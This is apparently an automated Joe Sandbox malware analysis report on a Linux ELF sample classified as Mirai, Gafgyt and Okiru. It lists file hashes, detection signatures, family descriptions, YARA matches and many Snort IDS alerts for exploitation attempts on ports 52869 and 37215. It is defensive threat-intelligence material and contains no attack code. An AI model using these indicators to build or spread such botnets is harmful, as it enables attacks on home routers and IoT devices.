Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
1gx339YsKN.elf

Overview

General Information

Sample name:1gx339YsKN.elf
renamed because original name is a hash value
Original sample name:2beb689c25baa0cc6a3a602be940271d.elf
Analysis ID:1477282
MD5:2beb689c25baa0cc6a3a602be940271d
SHA1:6ddbb1ffd273e36ada109eb03dbb8478c7389e1b
SHA256:96b847812fbdb3ccedb2d2e790992e4acaafabef8019506a1e9045ba131aff66
Tags:64elfgafgyt
Infos:

Detection

Mirai, Gafgyt, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Gafgyt
Yara detected Mirai
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1477282
Start date and time:2024-07-20 23:04:30 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 44s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:1gx339YsKN.elf
renamed because original name is a hash value
Original Sample Name:2beb689c25baa0cc6a3a602be940271d.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@6/0
  • Connection to analysis system has been lost, crash info: Unknown
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/1gx339YsKN.elf
PID:5540
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
SourceRuleDescriptionAuthorStrings
1gx339YsKN.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    1gx339YsKN.elfJoeSecurity_OkiruYara detected OkiruJoe Security
      1gx339YsKN.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        1gx339YsKN.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
          1gx339YsKN.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            Click to see the 15 entries
            SourceRuleDescriptionAuthorStrings
            5540.1.0000000000400000.0000000000421000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
              5540.1.0000000000400000.0000000000421000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
                5540.1.0000000000400000.0000000000421000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                  5540.1.0000000000400000.0000000000421000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
                    5540.1.0000000000400000.0000000000421000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                      Click to see the 20 entries
                      Timestamp:07/20/24-23:05:57.822356
                      SID:2025132
                      Source Port:39510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.453008
                      SID:2831300
                      Source Port:45346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.775474
                      SID:2027339
                      Source Port:53522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2829579
                      Source Port:43394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.664378
                      SID:2829579
                      Source Port:37000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2835222
                      Source Port:56910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2835222
                      Source Port:46962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2829579
                      Source Port:38778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.233230
                      SID:2027339
                      Source Port:51020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.459661
                      SID:2831300
                      Source Port:37304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.376131
                      SID:2027339
                      Source Port:49180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.544570
                      SID:2027339
                      Source Port:40972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.251572
                      SID:2027339
                      Source Port:58036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.816643
                      SID:2025132
                      Source Port:38376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.913786
                      SID:2831300
                      Source Port:36966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.462908
                      SID:2027339
                      Source Port:46216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.158457
                      SID:2025132
                      Source Port:50326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.513067
                      SID:2831300
                      Source Port:40720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.047373
                      SID:2027339
                      Source Port:34126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.944157
                      SID:2835222
                      Source Port:46950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.112994
                      SID:2027339
                      Source Port:58466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:19.727778
                      SID:2027339
                      Source Port:51782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.747119
                      SID:2025132
                      Source Port:45224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.203920
                      SID:2027339
                      Source Port:54424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.883933
                      SID:2027339
                      Source Port:38214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.705914
                      SID:2027339
                      Source Port:35966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.671322
                      SID:2831300
                      Source Port:55280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.887734
                      SID:2027339
                      Source Port:40808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.254464
                      SID:2027339
                      Source Port:53762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.973350
                      SID:2025132
                      Source Port:52096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2829579
                      Source Port:49950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.437168
                      SID:2831300
                      Source Port:35456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.960598
                      SID:2025132
                      Source Port:40488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.384426
                      SID:2027339
                      Source Port:59886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2829579
                      Source Port:34432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.175557
                      SID:2027339
                      Source Port:59414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2835222
                      Source Port:52176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.266004
                      SID:2027339
                      Source Port:56724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:48.642445
                      SID:2025132
                      Source Port:57946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.469824
                      SID:2027339
                      Source Port:46484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440249
                      SID:2027339
                      Source Port:58176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.234632
                      SID:2027339
                      Source Port:34100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.663982
                      SID:2831300
                      Source Port:54138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.496960
                      SID:2027339
                      Source Port:41850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.102034
                      SID:2027339
                      Source Port:59974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.137793
                      SID:2027339
                      Source Port:38872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.096689
                      SID:2027339
                      Source Port:37516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.761105
                      SID:2829579
                      Source Port:41812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.563341
                      SID:2027339
                      Source Port:44916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2835222
                      Source Port:59562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.581239
                      SID:2027339
                      Source Port:48100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.297065
                      SID:2025132
                      Source Port:43018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2829579
                      Source Port:60330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.016775
                      SID:2829579
                      Source Port:40562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.748553
                      SID:2835222
                      Source Port:52756
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.025297
                      SID:2027339
                      Source Port:45606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.227561
                      SID:2027339
                      Source Port:46750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.319028
                      SID:2831300
                      Source Port:55140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2835222
                      Source Port:50094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.180597
                      SID:2831300
                      Source Port:36018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.159645
                      SID:2027339
                      Source Port:57558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.745204
                      SID:2027339
                      Source Port:36472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.898078
                      SID:2027339
                      Source Port:51714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.818179
                      SID:2027339
                      Source Port:39224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.845937
                      SID:2027339
                      Source Port:44766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447263
                      SID:2831300
                      Source Port:55484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2835222
                      Source Port:43300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.853068
                      SID:2025132
                      Source Port:52464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.994605
                      SID:2025132
                      Source Port:43014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.455022
                      SID:2027339
                      Source Port:54354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2835222
                      Source Port:53888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.883252
                      SID:2025132
                      Source Port:49392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.737127
                      SID:2027339
                      Source Port:33034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.927271
                      SID:2027339
                      Source Port:54486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.124335
                      SID:2831300
                      Source Port:49002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.742051
                      SID:2027339
                      Source Port:60324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.037609
                      SID:2027339
                      Source Port:58900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.149825
                      SID:2025132
                      Source Port:35598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.265746
                      SID:2025132
                      Source Port:50084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.714340
                      SID:2027339
                      Source Port:52606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2835222
                      Source Port:51970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.682183
                      SID:2027339
                      Source Port:55722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.627679
                      SID:2027339
                      Source Port:49070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.325013
                      SID:2027339
                      Source Port:40996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.272030
                      SID:2831300
                      Source Port:60242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.696368
                      SID:2025132
                      Source Port:46052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.453720
                      SID:2831300
                      Source Port:40314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.326086
                      SID:2027339
                      Source Port:54150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.422378
                      SID:2027339
                      Source Port:51472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.589035
                      SID:2027339
                      Source Port:35772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2829579
                      Source Port:33654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.413313
                      SID:2027339
                      Source Port:55632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.477436
                      SID:2027339
                      Source Port:41364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.575727
                      SID:2831300
                      Source Port:34990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.395096
                      SID:2025132
                      Source Port:40524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.647376
                      SID:2831300
                      Source Port:40472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.480553
                      SID:2027339
                      Source Port:47430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.328787
                      SID:2025132
                      Source Port:55822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2835222
                      Source Port:56252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.382528
                      SID:2025132
                      Source Port:40634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.644841
                      SID:2829579
                      Source Port:44232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2829579
                      Source Port:49592
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.183242
                      SID:2831300
                      Source Port:46078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2829579
                      Source Port:37174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.225424
                      SID:2027339
                      Source Port:35392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2027339
                      Source Port:49538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2829579
                      Source Port:45582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.809155
                      SID:2025132
                      Source Port:45764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324297
                      SID:2829579
                      Source Port:58394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.384402
                      SID:2027339
                      Source Port:36686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2835222
                      Source Port:48436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.058070
                      SID:2829579
                      Source Port:49202
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.922584
                      SID:2027339
                      Source Port:59240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.551205
                      SID:2831300
                      Source Port:34848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.419591
                      SID:2027339
                      Source Port:44972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.893558
                      SID:2027339
                      Source Port:32924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.228618
                      SID:2025132
                      Source Port:39274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.434474
                      SID:2027339
                      Source Port:50436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:45.141052
                      SID:2835222
                      Source Port:57648
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.036645
                      SID:2025132
                      Source Port:53608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2835222
                      Source Port:53426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.910197
                      SID:2027339
                      Source Port:44802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2835222
                      Source Port:53270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.180627
                      SID:2025132
                      Source Port:32976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.551930
                      SID:2027339
                      Source Port:37128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.228937
                      SID:2027339
                      Source Port:41478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.478142
                      SID:2831300
                      Source Port:51922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.772622
                      SID:2025132
                      Source Port:47302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.451363
                      SID:2831300
                      Source Port:43750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2835222
                      Source Port:54206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.822070
                      SID:2027339
                      Source Port:57790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323712
                      SID:2835222
                      Source Port:49472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.141842
                      SID:2831300
                      Source Port:38632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.264639
                      SID:2027339
                      Source Port:45236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2829579
                      Source Port:34438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.260147
                      SID:2027339
                      Source Port:35044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440705
                      SID:2831300
                      Source Port:48322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.773172
                      SID:2829579
                      Source Port:52336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.334968
                      SID:2027339
                      Source Port:43234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.433907
                      SID:2835222
                      Source Port:44062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2829579
                      Source Port:60912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.244498
                      SID:2027339
                      Source Port:40774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.739089
                      SID:2831300
                      Source Port:34134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2835222
                      Source Port:37116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.511508
                      SID:2027339
                      Source Port:34594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.084045
                      SID:2027339
                      Source Port:42842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.893579
                      SID:2027339
                      Source Port:59714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.371373
                      SID:2027339
                      Source Port:53832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.058977
                      SID:2027339
                      Source Port:42174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.173503
                      SID:2027339
                      Source Port:42864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.731750
                      SID:2025132
                      Source Port:43194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.797336
                      SID:2025132
                      Source Port:38176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2835222
                      Source Port:44930
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.134757
                      SID:2025132
                      Source Port:40412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.339081
                      SID:2025132
                      Source Port:43654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2829579
                      Source Port:35398
                      Destination Port:37215
                      Protocol:TCP
